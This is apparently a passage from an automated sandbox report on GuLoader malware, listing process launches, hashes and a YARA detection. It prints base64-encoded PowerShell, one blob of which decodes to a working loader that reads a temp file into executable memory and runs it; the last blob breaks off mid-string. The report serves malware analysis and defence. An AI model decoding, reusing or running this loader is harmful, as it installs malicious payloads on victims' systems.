AUgBFAEgARQAgAFMAYQB4AG8AIABQAEEAUABJAFIAVAAgAGIAYQByAHkAZQAgAHIAYQB0AG8AbgBmAG8AcgBlAGQAIAANAAoAIwB1AG4AZABlACAAQQBNAFAASABJAFAATwBEACAAUwBwAHIAbwBnAGYAbwA2ACAAYgBvAG4AZAAgAEEATABUAFMAVAAgAEMAaABhAG4AZwBvAGEAbgBhAG4AIABQAEEAVQBSAE8AUAAgAEYAbwByAG0AaQBuACAATABvAHYAcAByAGkAcwBmAHIAZQA3ACAARQB4AGMAbwBjAHQAaQA2ACAAVABBAEsAVABTACAAQQBuAHQAaQBlAG0AcABpAHIAaQA3ACAARwBhAHIAbgBlAHIAaQBuAGcAZQAgAFAATABBAE4AWABUACAASwBOAEkAVgBNACAAdgByAGQAaQByAGUAZAB1ACAAUABvAGwAeQBjAGgAbwByACAAZQBsAGkAcwBvAHIAcwBoACAAVgBpAHQAZQBzAHMAZQAyACAAcwBlAHMAcwBpACAAQgBvAHIAdABsAGUAZAB0AGUAIABLAEEATgBEAEkAUwBFAE4ASwAgAEcAaQBuAHMAaQA0ACAASwBVAE4AUwBUAE0AVQBTAEUAIABQAGEAcgBlAHIAaQBuACAAUwBRAFUAVQBTAEgATwBLAFUATAAgAG0AYQB0AHIAaQBjAHUAbABhAHQAIABEAGkAbQBzAHMAcwBtADQAIABTAEUAUwBUAEkAQQBOACAAUgBlAGgAYQBiAGkAbABpAHQAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAEYAbwByAGwAeQA5ADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGcAZABpADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0ARgBvAG4AdABzAEEAKABzAHQAcgBpAG4AZwAgAEYAQQBCAEwARQAsAHUAaQBuAHQAIABLAG8AbgBnAGUAaAB1AHMALABpAG4AdAAgAEQAaQBzAHYAbwBpAGMAZQBhAG8ALABpAG4AdAAgAEYAbwByAGwAeQA5ADAALABpAG4AdAAgAE0AYQBpAG4AYQBzAGMAaABlACwAaQBuAHQAIABNAG8AcgBhAGwAaQB0ADEALABpAG4AdAAgAFQATwBSAEUAQQBEAE8AKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBLAEUAUgBOAEUATAAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIAQwByAGUAYQB0AGUARgBpAGwAZQBBACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAGEAYwAoAFsATQBhAHIAcwBoAGEAbABBAHMAKABVAG4AbQBhAG4AYQBnAGUAZABUAHkAcABlAC4ATABQAFMAdAByACkAXQBzAHQAcgBpAG4AZwAgAEYAQQBCAEwARQAsAHUAaQBuAHQAIABLAG8AbgBnAGUAaAB1AHMALABpAG4AdAAgAEQAaQBzAHYAbwBpAGMAZQBhAG8ALABpAG4AdAAgAEYAbwByAGwAeQA5ADAALABpAG4AdAAgAE0AYQBpAG4AYQBzAGMAaABlACwAaQBuAHQAIABNAG8AcgBhAGwAaQB0ADEALABpAG4AdAAgAFQATwBSAEUAQQBEAE8AKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAEYAbwByAGwAeQA5ADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAHIAdQBzAHQAbgBpAG4AZwBlAHIALABpAG4AdAAgAFAAbwBpAG4AdABzAG0AZQBuAGgALAByAGUAZgAgAEkAbgB0ADMAMgAgAEYAbwByAGwAeQA5ACwAaQBuAHQAIABXAE8AUgBLAFMASABJAFAATQBFACwAaQBuAHQAIABGAG8AcgBsAHkAOQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAPQAiAFIAZQBhAGQARgBpAGwAZQAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAEMARABBAEMAKABpAG4AdAAgAFAAbwBpAG4AdABzAG0AZQBuAGgAMAAsAHUAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADEALABJAG4AdABQAHQAcgAgAFAAbwBpAG4AdABzAG0AZQBuAGgAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAUABvAGkAbgB0AHMAbQBlAG4AaAAzACwAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAEkAbgB0AFAAdAByACAAUABvAGkAbgB0AHMAbQBlAG4AaAA1ACwAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADYAKQA7AA0ACgANAAoAfQANAAoAIgBAAA0ACgAjAEgATwBWAEUARABCAFkAIABWAEUATABTAEUAUwBNACAARQB2AGUAcgBlAGQAIABQAHIAbwBhAG0AYQB0AGUAdQAgAHAAYQBhAHMAawB5AG4AZAAgAEgAYQBhAG4AZABlAHYAZQBuACAAZgBvAHIAbABiAGUAcgBuACAAYgBlAHQAaABhAG4AawBpAG4AZwAgAGUAdQByAG8AdgBpAHMAaQBvACAARgBvAHIAdQBkAGQAaQBzACAADQAKACQARgBvAHIAbAB5ADkAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwATwBWAEUAUgAuAGQAYQB0ACIADQAKACMAYgBvAG8AawBsAGkAZgB0AG0AIABGAG8AcgBzAGEAZQBkAGUAdQAgAFUAbgBkAGUAcgBzACAAYgBvAHIAdABmAG8AcgBrACAAZABlAHQAZQAgAEwAYQBtAHAAYQAgAEIAbABhAG4AYwBoAGUAZAA2ACAAVABhAHcAcABpAGUAbQBhAHMAdAAgAHQAaQBsAHMAdABhAG4AZAAgAGsAYQByAHQAbwBuAG4AIABCAGUAdgBpAGwAZwBlAG4AZAAxACAAQgBhAGcAZwByAHUAbgBkADEAIABUAGEAbgB0AGEAbABpAHMAZQAyACAAQgBsAG8AZAB0ADMAIAANAAoAJABGAG8AcgBsAHkAOQAzAD0AMAA7AA0ACgAkAEYAbwByAGwAeQA5ADkAPQAxADAANAA4ADUANwA2ADsADQAKACQARgBvAHIAbAB5ADkAOAA9AFsARgBvAHIAbAB5ADkAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABGAG8AcgBsAHkAOQAzACwAMAAsAFsAcgBlAGYAXQAkAEYAbwByAGwAeQA5ADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBTAHYAawBsAGkAbgBnAGUAcgBuADEAIABiAGwAYQBuAGsAIABHAHUAdAB0AGUAcgBzAHMAZQAgAFUASABZAEcARwBFAE4AUwBJAEwAIABVAGYAbwByAGQAIABSAGkAZwBzAGcAcgBlACAAQgBMAE8ASwBOAEkAIABFAFYAQQBOAEUAUwAgAFQAcgBhAGMAdABhAGIAIABKAHUAbABlAG4AZQBnACAAYgBuAGYAYQBsAGQAZQBsAHMAIABNAEkAUwBMACAAbwBtAHMAdAAgAFQAZQBzAHQAaQBrAGwAZQBuADYAIABGAGkAbABtACAAcABhAG0AcABhAG4AZwBvAGsAbwAgAA0ACgAkAEYAbwByAGwAeQA5ADQAPQBbAEYAbwByAGwAeQA5ADEAXQA6ADoAVgBpAGEAYwAoACQARgBvAHIAbAB5ADkAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBMAGUAbgBzAGEAZgB0AGEAbABlACAATgBhAHQAdQA4ACAARgBPAFIAUwBBAE0ATABJAE4AIABJAG4AawBvACAAUwBVAEIATQBPAEQARQBBACAAZQBsAGUAZgAgAGMAYQB0AGEAcgBpAG4AZQBzACAAQgByAGEAbgBjAGgAZQBvAHIAIABOAG8AbgBmAGEAbgA1ACAATQBpAHMAdwA3ACAAQgBpAGwAbAAgAHoAbwBlAGYAbwByACAAUABhAGwAYQBlACAASwBoAGEAcgB1AG4AIAByAGUAdAByAGkAYgB1AHQAaQAgAFMAdQBmAGYAcgBhAGcAZQB0ACAATABpAG4AcwBlAHIAbgA3ACAARQBrAHMAaQBsAGUAcgA5ACAAYwBhAHQAYQBsAHkAcwB0AGwAZQAgAFYAYQBnAGkAZgAgAFMAawByAGwAbABlAHIAYQBuAGkAIABSAEUAVABTAEEAIABUAGgAcgBvAGMAawBzAGkAIABJAG4AZQBmAGYAaQBjAGEAYwA4ACAAZwBlAG4AZQByAGEAIABVAGwAdgBlAHUAbgBnACAATgBpAGcAaAB0AHcAYQByAGQAbgAyACAASwBWAEEARABSAEEAVABUAEEAIAANAAoAJABGAG8AcgBsAHkAOQA1AD0AMAA7AA0ACgAjAEwAYQBuAGQAcwByAGUAdABwAG8ANAAgAE8AcABzAHYAdQBsADMAIABLAG8AbgB0AHIAYQAgAHAAcgBlAGQAZQAgAEIAUgBBAE4ARABTAEwAIABTAEsATwBWAEQAQQBIAEwAVQAgAGQAZQBjAGEAbgBhAGwAcwBhACAAawBhAG8AbABpAG4AcwBhACAAZwByAHUAdAB0AGUAZABlACAAUwB0AHIAbQBmAG8AcgBiACAAUABzAGUAdQBkADYAIABIAGUAcAB0AGEAcgBjADgAIABTAGUAYwByACAAYgBpAGwAbABvAHcAaQBuACAAYgBhAHQAYwAgAEYASQBUAFQAQQBCAEwARQAgAFAAaQBuAGsAbgBlAHMAcwBlACAAUABTAE8AQwBJAEQAQQBFAEMASAAgAA0ACgBbAEYAbwByAGwAeQA5ADEAXQA6ADoAQwBEAEEAQwAoACQARgBvAHIAbAB5ADkANAAsACQARgBvAHIAbAB5ADkAMwAsADUAOQAxADcAOQAsAFsAcgBlAGYAXQAkAEYAbwByAGwAeQA5ADUALAAwACkADQAKACMAdABoAGUAbQAgAFMAUABBAFQAQQBMACAAUwB0AGEAbABsAGUAcgBvADgAIABQAGkAcwB0AGkAIABPAGUAZABpAGMAbgAgAEMAQQBOAE4ASQBCAEEATAAgAEwAeQBrAGsAZQBkAGUAcwBzADcAIAB0AHIAZQBkAGkAdgBlAGEAYQByACAAUgBlAGoAcwB0AGYANAAgAFMAVQBQAFAARQBUAEUAUgBSACAARgBsAGUAcgBkAG8AYgAxACAASQBuAG8AcgBkAGkAbgA1ACAASwBOAEIARQAgAFMAdABhAHQAaQAgAFIAZQBzAHQAYQB1AHIAYQB0ADgAIABMAGkAdABoAHkAcwA4ACAATABFAFQAVABSAE8AIABsAGkAZwByAG8AaQBuAHMAcgAgAEQAcgBiAHQAIABkAGUAZwBhAHMAcwBlAHMAIABCAGwAcgBlAHIAbwA4ACAADQAKAFsARgBvAHIAbAB5ADkAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAEYAbwByAGwAeQA5ADMALAAgADAAKQANAAoADQAKAA==
                                              Imagebase:0x170000
                                              File size:433152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:moderate

                                              General

                                              Target ID:3
                                              Start time:14:00:43
                                              Start date:12/05/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6fad10000
                                              File size:875008 bytes
                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Target ID:4
                                              Start time:14:01:05
                                              Start date:12/05/2022
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.cmdline
                                              Imagebase:0xe10000
                                              File size:2141552 bytes
                                              MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:moderate

                                              General

                                              Target ID:5
                                              Start time:14:01:06
                                              Start date:12/05/2022
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DC.tmp" "c:\Users\user\AppData\Local\Temp\ppgnlr3u\CSC3E3BD6AE19504271A02C9239AA6C641F.TMP"
                                              Imagebase:0x930000
                                              File size:46832 bytes
                                              MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Target ID:9
                                              Start time:14:01:21
                                              Start date:12/05/2022
                                              Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                                              Imagebase:0x980000
                                              File size:480256 bytes
                                              MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000000.4302405352.0000000000630000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:moderate

                                              General

                                              Target ID:10
                                              Start time:14:01:32
                                              Start date:12/05/2022
                                              Path:C:\Windows\SysWOW64\wscript.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Touchb.vbs"
                                              Imagebase:0xac0000
                                              File size:147456 bytes
                                              MD5 hash:4D780D8F77047EE1C65F747D9F63A1FE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Target ID:11
                                              Start time:14:02:08
                                              Start date:12/05/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBtAGUAcwBvACAAZABpAHQAdABvAGcAIABzAHQAagBlAHIAdABoAGEAZwBlACAAUAByAGUAdgBhAHIAaQBjAGEAdAAxACAAUAB5AHIAbwBsADYAIABkAGUAbAB1AG0AaQBuAGkAIABUAGEAcwB0AGUAYQByADcAIAB0AHIAbwBwAG8AIABlAG4AZwByACAAbgBvAG4AcgBlAHAAZQBuAHQAYQAgAA0ACgAjAFMAbQBpAHQAdAB5ADEAIABTAFAAUgBFAE4ARwAgAFUATgBWAEkAUwAgAEEAbABsAGUAcgBoAHYAIABBAHIAYwBoAGkAcAA5ACAAUgBJAE4ARwBNAFIASwBOAEkAIABVAG4AYwBvAG4AOQAgAEoARQBOAEIAUgBZACAARQBqAGEAawB1AGwAZQAgAFMAVABKAEUAUgAgAEsATwBNAE0AVQBOAEkASwAgAFMAbwByAHQAawA4ACAAcABoAGEAZQAgAFUAcQB2AHMAeQAgAE0AbwBuAG8AcAAzACAAQwBvAHUAbgB0AGUAcgBjAGwAMQAgAGIAYQBhAGwAYQBtAGIAcwAgAEUAeABwAGwAbwBzAGkAYgBsACAARQBQAEkARwBSACAAQwBlAHAAaABhAGwAbwBoAHUAbQAgAHQAZQBnAG4AdAAgAEcAUABTAEUATQBVAEwAUwAgAEEAZgBsAGEAYQBzADYAIABBAHMAYgBrADYAIAANAAoAIwBhAGIAaQBkAGkAIABQAGUAbgBnADkAIABhAHAAaABhACAAQwBhAHUAbABrAGUAcgBzACAAVABSAEYARgBFACAAVAB5AHAAaABvAG8AbgB0AG8AMwAgAGsAcgBhAHAAaQBuAGEAZgAgAEUAbgBsAGkAZwBzAHQAaQAyACAAUwBhAG4AawB0AGgAYQBuAHMAIABHAGUAbgBuAGUAbQA4ACAAQwBlAGwAaQBlAGMANgAgAEsAYQB0AGoAIAANAAoAIwBFAHAAaQBsAGUAcABzAGkAZQBuACAAUwBFAE0ASQBTAE8ATABVACAAcwBwAHIAZQBkAG4AaQBuACAATQBFAFQASABZACAAUABhAHIAYQBtAGUAIABCAHIAbgBlAGgAYQB2AGUAMgAgAEcARQBSAE0AQQBOAEkAUwBUACAARABSAEUAVABTAFMAIABFAE4AUwBQAE8AUgBFAFQASAAgAFMAdABlAGQAbQBvAGQANwAgAFMAdgBvAHYAbABzAHkAcgBlACAAQgBvAHIAZwBlAHIAcgAgAEsAbwBsAHAAbwByAHQAMQAgAHAAbABlAHUAcgBvAHQAIAANAAoAIwBiAG8AbgBzAGEAaQAgAFAAcwBlAHUAZABvACAAZgByAGkAdABpAGQAcwBjAGUAbgAgAFQARQBBAFQARQBSAEcATgAgAFAATABBAE4ARQBSAFMAIABWAEkATgBEAE0AIABTAHAAYQBsAHQAZQAgAFQAYQBiAGUAbAAyACAAQQBtAGIAYQBkAGUAZQBkAGkAZQAgAEMAaQBuAGQAZQByAHMAYgBhAG4AIABDAG8AYQB0AHQAMwAgAEMASABSAE8ATQBBAFQAIABjAGEAcgBsACAAUwB0AGkAZgB0ADEAIABzAHQAdgBmAG4AIABLAG8AbQBtAHUAbgBhADMAIABSAFIAVABBAE4AIABOAG8AbgBvAGkAbAAgAA0ACgAjAHMAZQBwAHQAZQBuAGEAdAAgAFAAcwBlAHUAZABvAGEAbQBiADgAIABOAG8AbgByAGEAYwBpAGEAIABWAGwAZwBlAHIAZQBzAGsAMwAgAEQAbwBnAGgAbwAgAFAAcgBvAGcAcgBhAG0AbQAgAEYATABVAEcAVABTAEsAWQBEACAAYwBsAGEAdQBzAHQAIABTAEUATABWAEYASQBOACAADQAKACMAZABpAHMAcABlAG4AcwAgAEEARgBGAEEATABEAFMAUAAgAFAAbABuAGUAcgBuAGUAcgAgAEcAbwByAGQAeQBrAG4AMQAgAEIAaQBvAGUAbAAgAFIAaABpAHoAIABOAG8AbgBhAGQAagBhADkAIABCAHIAaQBzADIAIABTAFQAVQBEACAAawBvAHIAcABvAHIAbABpAGcAdAAgAEMAaABhAHIAYwB1AHQAaQAyACAATQBhAGwAdABpAG4AZwBwAGUANgAgAFMAaQBrAGsAZQByAGgAMwAgAFUATgBJAFQASQBOAEcASQBOACAAZABpAHMAZQBuAHMAIAANAAoAIwBTAFAASQBTACAAcwB0AHIAeQBrAG4AaQAgAFQAcgBlAGEAcwB1AHIAZQAyACAAZgByAGUAZQB6ACAARABpAHMAbwByAGQAZQAgAEMAaQBmAGYAZQByAGYAbAAgAG0AZQB0AGEAZwBlAHMAIABVAHMAdABlAG0AcAAgAGUAZgB0AGUAcgBrAG8AbQBtACAAUwB5AG4AcwBtAHMANAAgAEwATgBTAEwAQQBWAEUAUwBSACAAQwBhAHQAcwA0ACAAcwBvAHYAcwAgAFcAaQBuAHMAIABQAHIAZQBjAGUAcAB0AGEANwAgAFQAQQBSAFMATwBNAEEATAAgAE8AYgBzAHQAZQByAG4AYQBzAGkANAAgAEUARgBUAEUAUgBUAFIAIABCAGwAZQBzAGsAdQBkADIAIAANAAoAIwB3AG8AbwBsAGUAbgBzAHIAIABQAEwATwBDAEUASQBGAE8AUgBNACAAUgBhAHUAbgBvACAAVABZAFAARQBSACAAaQBuAG4AdQBlAG4AZABvACAAUgBBAFAAUAAgAEIAbwBnAHMAdABhAHYAawAgAHUAYgBlAHMAIABBAGIAcwBpAG4AdABoACAARgBvAHIAcwBrAG4AaQBuACAASABPAFQARQBMAFYAUgBUACAAUwBrAGkAbgBuACAAYgBlAGQAcgBpAGYAdABlAG4AIABCAFIATwBLACAAZgBvAHIAcwBrAHUAZABzAGIAIABNAGkAcwBpACAAQQB1AG0AYQA2ACAATQBvAHMAcwBlAHIAbgBlAHMAIAANAAoAIwBIAGUAbQBpAGgAeQBwAGUAcgBpACAAQQBpAGsAbwBzACAAbQBhAGsAcgBvAGYAdQAgAHAAaQBsAGwAbQBhAGsAaQBuAGcAIABIAGEAYgBhAG4AZQByAGEAcwBkACAAVAByAG8AbAA2ACAAUgBZAEcAVABJAEsAQQBNAFAARQAgAFQAUgBGAEwARQBSAE4ARQBQAE8AIABtAG8AZABzAHQAYQBuAGQAcwAgAEQAeQBuAGEAbQBpACAAcAB1AGwAdgBpAG4AIABIAHkAcwB0AGUAcgBlAGMAdABvADEAIABNAHQAbgBpACAAYwBoAGEAcgB0ACAATABFAE0ATQBBAFQAQQBBAE4AIABLAG4AcwBrADYAIABmAGkAbABzAHQAcgB1AGsAdAAgAA0ACgAjAEsATwBFAFIAUwBMAEUAIABTAFQAWQBSAEUAVgBBAFIASQBBACAAQgBsAG4AZABlACAAUwBlAGQAaQBtADQAIABDAFIATwBTACAARABVAEUATABMAEUAUgBFACAAawByAHUAbQBtAGUAcwB1ACAAUABzAGUAdQBkAG8AcAAgAHMAaABlAHIAIABTAHQAYQBuAGQAaABhAGYAIABmAG8AcgB2AGUAIABTAGsAYQB0AHQAZQBhAGYAZABlACAAUgBFAFYARQBSAFMAQQAgAFQAUgBJAEwATABJAE8ATgBUAEEAIABQAHIAcgBpAGUAIABIAHYAaQBkACAARABhAG0AcgAxACAAVQBuAHMAdQA5ACAAcwBhAG4AagBhAHMAcABlAHcAIABmAGwAeQBkAGUAIABMAEkATgBHAFUATwBWAEUAUgBTACAAUgBlAHMAcABvADkAIAANAAoAIwB0AGkAbABmACAAUwBoAG8AdABnAHUAbgBhAGYANgAgAFoAdQBuAGkAcwBzADIAIABiAHIAZQByAGEAawAgAEMAQQBOAEMAQQBOAFIAIABNAGkAbgBjAGUAcwAxACAAVAByAGkAdABhAG4AMwAgAEwAQQBCAE8AIABLAGEAbQBtAGUAcgBtAHUAIABjAG8AdQBuAHQAZQByAHIAIABmAG8AbABrAGUAZAByACAAVABlAGwAZQB0AGUAawBuADYAIABJAG4AZABpACAAYQBmAHMAYQB2AGUAcgBoACAAaQBuAGQAYgAgAFAATABBAE4ASwAgAEkAbgB0AGkAOAAgAEkAbgBmAGkAbgBpADUAIABhAG0AbgBpACAAUABSAE8AWABJAE0ASQBUACAAbwB0AGEAcwByAGkAcwB0AG4AaQAgAG0AbwB1AGwAZABzAGEAdQAgAA0ACgAjAG8AcgBnAGEAbgBlAHQAbABhAHMAIABOAG8AbgBpACAAbgB5AHQAdAAgAG0AdQB0AHUAIAB0AGEAawBuACAATwBtAGsAcgBlAGQAcwBlAG4AIABNAEkATgBJAE0AVQBNAFQAUgAgAE8AdgBlAHIAdABqADIAIABTAHQAcgBlAGEAawAgAFMAYQBuAHMAIABCAGkAbwBtAGUAMwAgAGYAYQBpAHIAawBlACAARwBlAGIAcgBvAGsAbgA2ACAAQgBlAG4AYQBlAGcAdAAxACAAUwBDAEgARQBOAEsATAAgAFUARABMAEkAQwBJACAAQwB5AGQAaQBwAHAAaQBkADMAIABMAGEAbgBnAHQAdQByAHMAYwA1ACAAdQB0AHQAaABlAGQAZQByAHMAIABiAGwAbwBrAHAAbwBzAHQAbQAgAFEAdQBhAHIANQAgAGgAbwBtAGUAbwB0AGgAZQByACAAQQBjAGsAbABlAHkAYwBlADgAIABzAGEAbQBtAGUAbgBwAHIAZQAgAGUAbABhAHMAdABpAG4AcwBoAGEAIAANAAoAIwBGAFIAUwBUAEUARABJAFIAIABVAEQATQBBAFQAUgAgAEsAaQBkAGwAaQBrACAARABJAEEARwBOAE8AIABXAEkATQBQAEkATgBFAFMAIABCAHIAbwBhAGQAbABpAG4AZwBzACAAUwBrAGkAbgBrAGUAcgAgAFAAcgBvAHQAbwBnAGkAbgAzACAARQBNAFAASQBSAEkAUwAgAFMAawBlAGUANQAgAE0AQQBOAEQAQQAgAFMAUABJAE4AQQBUAEYAIABTAHAAZQBjAGsAbABpAG4AZwB6ADYAIAANAAoAIwBSAGEAYQBkADMAIABTAE8ATgBHAFcAUgBJAFQAIABBAG4AdABoAHIAbwBwAG8AIABUAEUATABFAEYATwBOAFMAIABBAE0ARQBOAEEATgAgAFMAbQBlAGwAIABTAHQAYQBsAGQAYgByAGQAcgAgAEYAWQBSAFYAUgBLAEUAUgBFAFMAIABTAG4AaQBwAGUAbgBiADYAIABTAGkAdAB1ADkAIABBAHUAZABpAGUAbgAyACAAUgBpAGsAbwBjAGgAZQB0ACAASQBuAGMAdQByAHMAbgB5ACAARgBvAHgAdABhAGkAbABzAGQAYQAgAEEASwBLAFIAIABBAGsAaQBtAGgAdQBzADYAIABJAG4AcwB1AHIAcgBlADMAIABCAG8AdAB0AGwAZQBjAGEAcAAgAEUAdQBvAG4AeQBtAGkAbgBkACAAcABhAHAAeQByAG8AZwAgAFAAZQBkAGkAIABNAG8AcABpAHMAaABuAGUAcwBzACAAQQBmAGYAZQBqAGUAbgBkAGUAcwA2ACAAQgBSAEkARwBHAEUATgBEACAAQgBhAHIAcwBlACAAVQBuAGQAZQByAGsAIABQAFIATwBEAEQARQAgAEoARQBOAEwAIAANAAoAIwBiAGUAbgBlAGwAIABkAGkAcABwAGUAcgAgAFIAYQBkAHoAIABqAGUAYgBsAGkAawBzAGEAZgB0ACAAdABlAGsAbgBvAGsAcgBhAHQAIABTAHcAaQBuACAATQBhAHIAbQBvAHIAIABNAGUAcgBlADEAIABTAGsAcgBrAHAAcgBvAHAAYQAgAEYAYQB0AHQAaQBnAGcAMwAgAHYAZQBhAGQAbwByAGUAbwB1ACAATgBPAE4AVgBBAFMAQwAgAHIAYQBuAGsAbABlACAAQgByAG4AZQAgAEMAbwBtAHAAIAANAAoAIwBNAGEAcwB0AGUAcgBsAGkAawBlACAAaABlAGwAaQBvAGwAbwBnAGkAIABEAG8AbABiAHkAcwB5ACAATgBFAEQARQAgAFAATwBSAFQASQBFACAAQQBuAGcAcwB0AHQAcgBzAGsAIABBAGsAdABpAG8AbgBzAGcAIABZAGQAZQByAHIANwAgAEUAVgBJAEcASABFAEQAUwBLACAAUwBQAEkATABEACAASQByAGkAdABpAGMAIABHAG4AYQB0AGgAbwBiAGQAZQAxACAAYgBsAGEAcgB0AGYAbwByAHMAIABSAGUAZgByAG4AcwA2ACAAbABlAGQAaQBnAGgAZQAgAEYAbwBkAGcAbgBnAGUAcgBuACAADQAKACMAUwBtAGUAbAB0AGUAbwBzACAARQBuAG8AcwBpAHMAZQBzACAAUwBQAEEATgBJAEUAUgAgAGEAZgB0AGUAcgB0AGEAeABhAG0AIABNAEUAWgBaAEEATgBJAE4ARQBUACAATABHAEQATwBNAE0ARQBSAEUAIABOAGUAZABzAGwAYQBnAGUAbgAgAG0AbwBsAGUAcAByAG8AIABiAG4AcwBrAHIAaQBmAHQAZQAgAEMAdQBzAGgAaQAgAFMAaABlAHQAbABhAG4AZABzAHAAIABEAGQAbgBpAG4AZwAgAEIAZQB0AHIAawBrAGUAMQAgAEcAbwBkAG4AYQB0ACAAQwBvAG4AdgBpAHYAaQBhADUAIABTAHAAaQByAGEAbAB0AGEAYQBnACAAcwBhAHgAYwBvAHIAbgBlAHQAIABCAGEAZwBlAHAAIABMAE8AVgBLAEEAVAAgAGEAaQByAGIAdQAgAE4AbgBzAG8AbQA0ACAAQgBsAG8AZABwAHIAbwBwADkAIABSAEgATwBQAEEATABPAEMARQBSACAAZQBuAGMAaABhAHMAZQByACAADQAKACMAdgBvAGwAZAB0AGcAdAAgAFUARABTAEwAQQBHAEcASQBWACAAQgBhAGwAYQBuACAAQQBrAHQAaQB2AGkAdAA0ACAARQBLAFMAUABPAFMASQBUAEkATwAgAHMAdABhAG0AbQBlACAATQB5AHQAaABvAGwAbwA4ACAAVABIAFIATwBUAFQATABFAFIAIABWAGkAbgBkAHUAZQAgAFYAQQBTAEUAUgBIAFUAIABiAGwAbwBkAHMAawB1ACAAaABvAG0AbwBuAHkAbQB5AHUAIABVAFIAUwBLAE8AVgAgAFQAYQBhAGwAbQBvAGQAOAAgAFUASABJAE4ARAAgAFAAUgBPAEQAVQBLAFQASABBACAAVQBNAE8AUgBBAEwARQBOAEQASQAgAEYATwBSAE0AQQAgAEIAbABlAHMAYgA5ACAARwB5AHAAdABlAHIAZQBzAG8ANAAgAEQAYQB0AGEAYgAgAE